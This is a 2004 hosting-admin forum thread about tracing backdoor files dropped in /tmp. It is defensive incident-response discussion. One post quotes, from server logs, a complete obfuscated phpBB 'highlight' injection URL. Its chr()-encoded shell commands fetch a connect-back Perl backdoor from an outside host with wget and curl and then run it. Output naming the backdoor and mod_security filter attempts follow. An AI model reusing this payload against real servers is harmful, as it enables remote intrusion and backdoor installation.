The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Tracing source of items in /tmp

Discussion in 'General Discussion' started by hicom, Dec 5, 2004.

  1. hicom

    hicom Well-Known Member

    Joined:
    May 23, 2003
    Messages:
    272
    Likes Received:
    0
    Trophy Points:
    16
    I noticed couple of items in /tmp that don't belong:

    -rw-r--r-- 1 nobody wheel 761 Dec 4 14:43 dc.pl.htm
    -rw-r--r-- 1 nobody wheel 761 Sep 30 11:12 dc.pl.htm.1
    -rw-r--r-- 1 nobody wheel 761 Sep 30 11:12 dc.pl.htm.2
    -rw-r--r-- 1 nobody wheel 761 Sep 30 11:12 dc.pl.htm.3

    So I wanted to trace them, usually any hacking stuffs that goes into /tmp must have been uploaded somehow through a domain, so I went to Apache's domain logs:

    /usr/local/apache/domlogs

    I did:

    > grep -r -i -n dc.pl ./

    But it didn't find any matches. Could there be another way these files have been uploaded to the server , or am I doing something wrong ? I recall the grep method worked for me before, but this time i'm not getting any results.

    I'd like to trace the script to patch the domain / program caused it.
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    A couple of things:

    1. Is your nobody account in the wheel group? If it is it should not be!

    2. If you want to track files uploaded by PHP scripts (which they will be from unless you have suexec disabled) then you should run phpsuexec, unless you have a specific reason not to.
     
  3. hicom

    hicom Well-Known Member

    Joined:
    May 23, 2003
    Messages:
    272
    Likes Received:
    0
    Trophy Points:
    16
    >> 1. Is your nobody account in the wheel group? If it is it should not be!

    I might be somewhat crazy, but not that crazy :)

    >>2. If you want to track files uploaded by PHP scripts (which they will be from unless you have >>suexec disabled) then you should run phpsuexec, unless you have a specific reason not to.

    Yah we're planning to roll out suPHP after the holiday season, we're just working out a plan to minimize the effect on some of the applications running on the server. Until then, I must find a way to track these ugly scripts. /tmp is secure anyway, so they are unable to execute, but I can't sleep knowing somewhere there is a way for some people to get in.
     
  4. hicom

    hicom Well-Known Member

    Joined:
    May 23, 2003
    Messages:
    272
    Likes Received:
    0
    Trophy Points:
    16
    Oh My God!

    Wow! I found it:

    /forum/viewtopic.php?t=144&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(99)%252echr(111)%252echr(109)%252echr(101)%252echr(99)%252echr(111)%252echr(59)%252echr(117)%252echr(110)%252echr(97)%252echr(109)%252echr(101)%252echr(32)%252echr(45)%252echr(97)%252echr(59)%252echr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(118)%252echr(97)%252echr(114)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(47)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(99)%252echr(100)%252echr(122)%252echr(114)%252echr(48)%252echr(120)%252echr(46)%252echr(122)%252echr(105)%252echr(112)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(100)%252echr(99)%252echr(46)%252echr(112)%252echr(108)%252echr(46)%252echr(104)%252echr(116)%252echr(109)%252echr(59)%252echr(99)%252echr(117)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(111)%252echr(32)%252echr(100)%252echr(99)%252echr(46)%252echr(112)%252echr(108)%252echr(46)%252echr(104)%252echr(116)%252echr(109)%252echr(32)%252echr(99)%252echr(100)%252echr(122)%252echr(114)%252echr(48)%252echr(120)%252echr(46)%252echr(122)%252echr(105)%252echr(112)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(100)%252echr(99)%252echr(46)%252echr(112)%252echr(108)%252echr(46)%252echr(104)%252echr(116)%252echr(109)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(100)%252echr(99)%252echr(46)%252echr(112)%252echr(108)%252echr(46)%252echr(104)%252echr(116)%252echr(109)%252echr(32)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(102)%252echr(105)%252echr(109))%252e%2527

    Someone used this on phpBB forum and this is the result:

    uncomeco FreeBSD impala.myserver.com 4.10-RELEASE-p2 FreeBSD 4.10-RELEASE-p2 #0: Tue Aug 17 15:21:34 EDT 2004 wmail@impala.myserver.com:/usr/src/sys/compile/GENQHZ i386 Data Cha0s Connect Back Backdoor Usage: dc.pl.htm [Host] unfim uncomeco FreeBSD impala.myserver.com 4.10-RELEASE-p2 FreeBSD 4.10-RELEASE-p2 #0: Tue Aug 17 15:21:34 EDT 2004 naha@impala.myserver.com:/usr/src/sys/compile/GENQHZ i386 Data Cha0s Connect Back Backdoor Usage: dc.pl.htm [Host] unfim uncomeco FreeBSD impala.myserver.com 4.10-RELEASE-p2 FreeBSD 4.10-RELEASE-p2 #0: Tue Aug 17 15:21:34 EDT 2004 naha@impala.myserver.com:/usr/src/sys/compile/GENQHZ i386 Data Cha0s Connect Back Backdoor Usage: dc.pl.htm [Host] unfim uncomeco FreeBSD impala.myserver.com 4.10-RELEASE-p2 FreeBSD 4.10-RELEASE-p2 #0: Tue Aug 17 15:21:34 EDT 2004 naha@impala.myserver.com:/usr/src/sys/compile/GENQHZ i386 Data Cha0s Connect Back Backdoor Usage: dc.pl.htm [Host] unfim


    PHPBB has an update 2.0.11 version to hopefully resolve this.

    More info: http://www.phpbb.com/phpBB/viewtopic.php?p=1332159&highlight=252echr+99#1332159
     
  5. eth00

    eth00 Well-Known Member
    PartnerNOC

    Joined:
    Mar 30, 2003
    Messages:
    723
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    NC
    cPanel Access Level:
    Root Administrator
    Yeah there have been a few nasty phpbb/nuke bugs recently that allow for injection of commands. You may want to look into mod_security.
     
  6. hicom

    hicom Well-Known Member

    Joined:
    May 23, 2003
    Messages:
    272
    Likes Received:
    0
    Trophy Points:
    16
    We do have mod_security installed, but it didn't catch it.

    How could you block such attack in mod_security ?

    I tried:

    # Web-ATTACKS phpBB injections attempts
    SecFilter "chr\"

    but that didn't work.

    Thx
     
  7. fishfreek

    fishfreek Well-Known Member

    Joined:
    Jan 2, 2004
    Messages:
    238
    Likes Received:
    0
    Trophy Points:
    16
    I am extremly interested in what rules we can add to mod_security to stop this phpbb exploit. Regretfuly we have a ton of idots hosted on our servers who dont upgrade, dont bother to check for upgrades. I have set a deadline of midnight tommorow for updating their forums or they will get suspended until they do update. I would like the mod_security module to act as a backup for protecting the server as a whole. The mod_security wget rule seems to work to some extent but hackers are still putting files in /tmp and even /dev/shm/.

    Not sure how this is happening as I have even done the securetmp script that I thought was to secure the tmp partion from having code that was executable.
     
  8. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    That is not what noexec on a partition does. All that does is to prevent an executable from being run directly from the partition, it doesn't stop an executable being copied there and run through another method (e.g. a perl, PHP or shell script).

    Have you enabled php SUEXEC so at least if they are compromised, only their site will be trashed, rather than everyone elses? It's only one layer, but it should be one of the first things you look at. Of course, it only takes one local root exploit and your server is gone, so time is of the essence.
     
  9. fishfreek

    fishfreek Well-Known Member

    Joined:
    Jan 2, 2004
    Messages:
    238
    Likes Received:
    0
    Trophy Points:
    16
    I cant enable phpsuexec on that server because there is a client running VB3 and they are using the archive feature with it. Apparently the VB script is written so poorly the archive feature wont work with phpsuexec enabled. That is from info posted on their support forum.
     
Loading...

Share This Page